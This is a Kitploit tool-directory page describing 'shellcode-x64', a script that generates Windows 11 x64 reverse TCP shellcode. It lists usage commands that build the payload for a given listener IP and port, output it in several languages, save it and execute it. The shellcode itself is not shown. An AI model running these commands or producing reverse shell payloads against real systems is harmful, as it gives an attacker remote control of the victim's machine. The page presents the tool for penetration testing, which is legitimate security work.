Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
shellcode-x64 — Shellcodes for Windows >= 11 x64 | Kitploit
Tools/GitHubGitHub/hvictor/shellcode-x64
Payload GenerationExploitationShellcodePenetration TestingRed TeamingShellcode GenerationPayload Development
GitHubhvictor/shellcode-x64

shellcode-x64

Shellcodes for Windows >= 11 x64

View Repository
736 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Shellcode for Microsoft Windows 11 x64

Python Assembly

This script generate Windows 11 x64 Reverse TCP Shellcode with PIC technique.


Usage for generate shellcode

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443

Defualt language is C type shellcode, also Python, Csharp and powershell:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell

For save file:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true

Defualt output is output.bin:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin

For test and execution:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true

And:

root@kitploit:~
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin

Happy learning ;)

Download Tool